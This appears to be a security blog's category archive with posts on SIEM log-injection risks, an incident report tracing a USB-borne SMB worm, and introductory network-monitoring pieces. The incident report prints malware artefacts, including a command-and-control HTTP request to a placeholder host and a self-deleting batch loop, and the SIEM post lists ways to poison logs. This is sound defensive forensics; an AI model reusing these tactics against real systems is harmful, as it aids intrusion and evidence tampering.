Archive for the Why watch the wire? Category

Si(EM)lent Witness

Posted in General Security, Why watch the wire? on 23 June, 2010 by Alec Waters

Obligatory disclaimer: I Am Not A Lawyer. “Evidentiary weight” is probably something that involves a set of scales.

Evidence of an electronic crime is most commonly retrieved through a well-established process of computer forensics. Regardless of the actual examination techniques used, the evidence (a seized hard drive, for example) has to be handled in such a way that its integrity is preserved, usually by way of examining a forensic duplicate of the media and leaving the original in the evidence safe.

It’s a little different when practicing network forensics:

  • You have to be routinely collecting the evidence before the mischief is perpetrated. Network-based evidence is fleeting in nature – once it’s gone, it’s gone – if you’re not recording something all the time, when the mischief happens you’ll miss it.
  • There isn’t such a firm concept of “original” or “best” evidence as there is in the computer forensics world. Packet captures are a copy of the original traffic, collected syslog messages are copies of log messages from a device, and netflow exports are descriptions of an act rather than the act itself. None of the copies are “forensically sound” like a disk image can be considered to be; they all sound rather like second-hand accounts.

A handy thing to do with all this evidence is to collect it, usually with some kind of SIEM or Log Management device, and vendors of such devices go to lengths to preserve the integrity of the collected data to maximise its weight as evidence. For example, a Cisco CS-MARS box stores everything in an internal Oracle database to which the user has no direct access; the idea is to give some assurance that the collected logs haven’t been tampered with. Other vendors like AlienVault say that their product “Forensically store(s) data (admissible in court)”. Given the potentially second-hand nature of our evidence, these anti-tamper measures are surely a good thing.

However, how can we convince someone that the evidence we are presenting is a true and accurate account of a given event, especially in the case where there is little or no evidence from other sources? Perhaps a laptop’s hard drive has been shredded, and the only evidence we’ve got is from our SIEM/LM box. Our evidence may be considered unreliable, since:

  • It could be incomplete:
    • A packet capture may not have captured everything – dropped packets are commonplace.
    • UDP-based message transfer (syslog, netflow, SNMP trap, etc.) is best-effort delivery. Dropped messages will not be retransmitted, and most likely a gap in the sequence will not even be noticed.
    • We may have exceeded our SIEM’s events per second threshold, and the box itself may have discarded crucial evidence.
  • The body of evidence within our SIEM could have been tampered with.

But didn’t I say that vendors went to great lengths to prevent tampering? They do, but these measures only protect the information on the device already. What if I can contaminate the evidence before it’s under the SIEM’s protection?

The bulk of the information received by an SIEM box comes over UDP, so it’s reasonably easy to spoof a sender’s IP address; this is usually the sole means at the SIEM’s disposal to determine the origin of the message. Also, the messages themselves (syslog, SNMP trap, netflow, etc.) have very little provenance – there’s little or no sender authentication or integrity checking.

Both of these mean it’s comparatively straightforward for an attacker to send, for example, a syslog message that appears to have come from a legitimate server when it’s actually come from somewhere else.

In short, we can’t be certain where the messages came from or that their content is genuine.

So what could an attacker achieve by injecting false messages into an SIEM?

  • They could plant false evidence of an act that did not take place. Perhaps we want to get someone fired for downloading questionable materials, for example.
  • They could plant “tasty” evidence that the SIEM operators are likely to investigate first, buying the attacker time.
  • They could force the box over its EPS limit so that genuine evidence is discarded.
  • They could inject malformed messages that may lead the SIEM operators to believe that their box is somehow corrupted, and wait until it is offline for maintenance before striking.
  • They could inject events or series of events that “couldn’t happen” to cause the SIEM operators to distrust the accuracy of the system (e.g. a proxy log message indicating a fetch of a webpage with no corresponding netflow export).
  • Or perhaps their aim is to simply discredit the entire pool of evidence by injecting obviously false messages. Yes, an analyst could try to weed out the fake ones, but could they prove that they’d found all of them?
  • <insert your own creative evil here>

If there’s any doubt as to the provenance of a message received by the SIEM, one could always go back to the original source and look for it there. The problem here is that it might not be there any more (due to log rotation on a server) or there may not even be an original to compare it to (a netflow export is the original message, for example).

I’m surely being a bit pessimistic here, but given that there’s a distinct possibility that any given SIEM is chock full of lies, how much evidentiary weight does its content actually possess? Does anyone know of any successfully-prosecuted cases where evidence from an SIEM has been key?


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daigu­o.com/?self

This is a geolocation site, and returns the string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

8:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

9:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

9:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.

On $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not a safe assumption to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary, first four bytes is the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del “C:\gxcinr.exe”
    if exist “C:\gxcinr.exe” goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 ­ TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively unlimiting the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy was applied, then the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5′s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae
Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than believing it to be effective, we need to make sure it is effective through strategies like the collection of information and the (unceasing) vigilance to detail required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Quis custodiet ipsos facis?

Posted in Why watch the wire? on 15 May, 2009 by Alec Waters

According to the Magic Internet, that means “who watches the packets?” I bet my latin teacher would have a few comments on that translation…

Anyway, we’ve decided that we’re interested in the network traffic crossing the point between our switch and our small-office router. We have made this decision because we do not wish to trust our security solely to preventative measures which will inevitably let us down. We want to try to spot the Badness getting in and out, and this is the way to do it.

The practicalities of this are twofold – we need a sensor with which to collect the traffic, and we need some way of directing our traffic to it so that it can be examined.

For the most part, the sensor is some kind of computer with at least one network interface of a type appropriate to your infrastructure (e.g., perhaps it’s an ordinary copper ethernet interface, or a fibre-optic interface, or even a wifi one). The sensor will not interfere with the collected traffic in any way, as it will usually be fed a copy of the traffic you want to inspect. This prevents the mere presence or absence of the sensor from breaking any of your stuff, and also has the happy side effect of preventing the Baddies from even knowing you’ve deployed it.

There are a number of ways we can get a copy of our network traffic to our sensor:

  • If our switch is capable of it, we might be able to set up a SPAN port. We can configure a SPAN port that will output a copy of everything sent and received on the switchport that connects to our router. By plugging our sensor into this SPAN port, it will be able to see all of our Internet traffic.
  • If our sensor has two or more monitoring interfaces, we can use a network tap. A tap will physically sit on the path between our switch and our router, and will “syphon off” a copy of the network traffic for our sensor to look at. Although the tap is inline, it doesn’t alter the observed traffic and it won’t permit the sensor to inject any traffic of its own. It’s the purest form of capture, and can be dropped in without altering the configuration of any other devices. Tap manufacturer Netoptics has a comparison between tap and SPAN here.
  • A final option might be something like Cisco’s Raw IP Traffic Export (RITE). This is something of a last choice, though; generally speaking tap and SPAN are superior options. However, for some topologies this may be the only option – you may not be physically able to use tap or SPAN if you want to capture the traffic crossing a virtual IP interface on a layer three switch, for example.

For the sake of simplicity, let’s say our sensor has just one monitoring interface and we’re feeding it from a SPAN port on our office’s switch. We are now ready to spot the Badness! However, our sensor needs to be able to do something with the traffic we’re spewing at it. We need to be able to receive it, store it, inspect it, mine it.

Hold tight – things are about to get interesting!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Baby steps, part two

Posted in Why watch the wire? on 12 May, 2009 by Alec Waters

Baby Steps ended by asking how we can use the network itself “to extract information from strategic points that will tell us what is going on”. To start to explain, let’s have an example of a “strategic point”.

When I was at junior school (at about ten years of age), we were given a practical maths assignment which meant us leaving the school grounds. This was a big deal, because our school was quite literally a fortress – it had fifteen foot high brick and flint walls topped off with another six feet of chickenwire, only interrupted by heavy iron gates. Don’t get me started about the guard towers and searchlights. As such, it was a rare treat to get outside during school hours without resorting to re-enacting the Great Escape.

Our maths task for the day was to conduct a traffic survey. We were to sit with our backs to the outside of the fortress wall, count the passing cars, and group them by colour. After twenty minutes or so of this, we were shepherded inside by the guards teachers to prepare a report on which colours of car were most popular based upon our observations.

So, what has this got to do with strategic points and network security? It’s all to do with visibility, in terms of the quantity and type of traffic you want to observe.

Our school was on a main road, so we had a fair sample set to show for our twenty minutes’ worth of observations. If our school was instead next to a motorway, our sample set would have been huge (and possibly beyond the ability of a ten year old to accurately collect with a pencil and paper). If the school was in a cul-de-sac, we’d have hardly seen anything at all. So, if we want a large sample set the motorway is probably the best choice, albeit with the risk that we won’t be able to record everything we see.

On the other hand, the type of traffic may be more important to us than the quantity. If we want to observe trucks hauling huge loads, the motorway is the best place to look. If we’re interested in local bus services, our school’s main road might fit the bill. If we want to know about people’s milk deliveries, then the cul-de-sac would be a more fruitful place to conduct your sampling.

Coming back to network security, we have already established that we want to look at what is going on on the network; the next step is to pick one or more strategic points where we can do the looking. This will depend entirely on what your own infrastructure looks like, and what it is you’re hoping to see.

For the purposes of our baby steps, we’ll take the simple example of a small office. It has a dozen or so workstations connected via a switch, a single server (also on the switch), and a router that connects the whole lot to the Internet. We have already established that there is Badness on the Internet, and that we should watch for it. Given this objective, a suitable strategic point to monitor would be the point where the switch plugs into the router. All traffic either to or from the Interet will cross this point – if Badness is getting in or out, this is the route it has to take and with a bit of luck, we’ll catch it in the act.

(I should emphasise at this point that monitoring our little office’s border with the Internet will not tell us anything about the conversations that the workstations and the server have between themselves – we’ll only see traffic that involves the Internet. If you’re interested in “local” traffic, you’ll need to conduct your monitoring elsewhere on your network, possibly at more than one location).

Having picked the place to do our monitoring, we now need to decide how we’re actually going to do this. Clearly, a ten year old with a pencil isn’t going to cut it. Perhaps there’s some technical marvel that can help us out? Stay tuned!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Baby steps

Posted in Why watch the wire? on 7 May, 2009 by Alec Waters

Referring back to my initial post, I said:

“I believe that the network itself (remembering my specific interpretation of the word “network”) is a great and often untapped source of security information”

Why do I think this, and what does it all boil down to at the end of the day?

Well, the “why” is based on the following rash assumptions:

  • Rash assumption #1 – “Badness” exists on the Internet (by “Badness” I’m talking about threats including viruses, trojans, bots and other such malware)
  • Rash assumption #2 – If the Badness reaches your computer, the most likely (but far from only) means by which it got there is via the network. It could have come in via an email, or a drive-by download, or via a peer-to-peer filesharing application – at this point in the discussion, the precise infection vector is unimportant. I just want to stress the fact that having a network connection provides a potential way in for Badness
  • Rash assumption #3 – Once present on your computer, the Badness will use the network in some way, either to receive a list of Evil Tasks from the Baddies, or to send the Baddies your banking credentials, or to perpetrate some other naughtiness.

Hopefully none of these assumptions can be reasonably refuted!

The common theme amongst these assumptions is the network itself. By connecting yourself to the Internet, you’re tapping into a vast pool of Badness, all of which wants to make its way onto your computer. Once there, the byproducts of the Badness will leave your computer via the same route – the network. It therefore follows that it ought to be productive to monitor the traffic crossing the network, and look out for signs of Badness.

Still with me?

Given the existence of the Badness, and the potential route it has to get onto your computer, what can we do about it? We clearly need some defences here. A three-layered approach might be to strive to achieve the following:

  1. Stop the Badness in its tracks. This is the ideal situation, and can be addressed with preventative measures such as:
    • Network- and host-based firewalls
    • Network Intrusion Prevention Sensors (IPS, actually a specialised class of firewall)
    • Email firewalls that scan messages for Badness well before the message actually reaches your computer
    • Network-based URL filters or proxies that intercept your web requests and stop you from fetching anything that is known to be Bad
    • Anti-virus software
    • Keeping the software on your computer patched in a timely fashion

    However, sooner or later, one or more of these will let you down and the Badness will get to your computer. So, at some point or another, we’ll need to fall back to the second line, which is to:

  2. Detect the Badness in a timely fashion. If we can’t stop the Badness, at least give us a chance to detect the Badness so that we can act before something really catastrophic goes down. We have to watch the network like a hawk, not just for the alerts raised by the preventative measures listed above, but for much more subtle things. We’re interested in anything anomalous, like:
    • Traffic at strange times of the day
    • Traffic on strange ports
    • Traffic to or from strange destinations
    • Unexpected traffic volumes or per-flow packet counts

    Your preventative measures are unlikely to report on indicators like this. Given the vagueness of what actually defines “anomalous” in your own context, it is pretty much a given that it is a person (not a machine) that makes this determination.

    Finally, we have to cover the case where Badness has got in undetected, and has wrought whatever carnage and mayhem its creator had in mind. In short, we need to:

  3. Gather enough forensic information to work out exactly what has happened, after you’ve found out about your own security breach in either the popular press or the legal papers that have just been served upon you. Take the relatively benign example where some rogue anti-virus software is popping up on your computer, telling you there are zillions of problems, and that it can fix them all (for a price!). We need to be able to determine:
    • Where the Badness came from
    • If anything else got downloaded along with the rogue anti-virus software
    • If there have been any unexpected network connections from the suspect machine

    Now, we can’t readily ask these questions of the infected machine. If the infection has been thorough enough, your computer will lie to you. It will tell you everything is OK, that there are no strange processes running, and that there is definitely no unusual network activity.

The only way to provide for all of this is to make use of the network itself. We need to be able to extract information from strategic points that will tell us what is going on now and also what happened at half past four last Tuesday afternoon. We need to be able to mine this information for usable snippets of intelligence, expressed in terms of low-level things like IP addresses and ports all the way through to higher-level things like URLs visited and emails sent and received. With this information at our fingertips, it becomes feasible to attempt to “Detect the Badness in a timely fashion” and to “Gather enough forensic information to work out exactly what has happened”.

So, how do we do all of this? That’s a topic for next time – stay tuned.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Follow

Get every new post delivered to your Inbox.

Join 28 other followers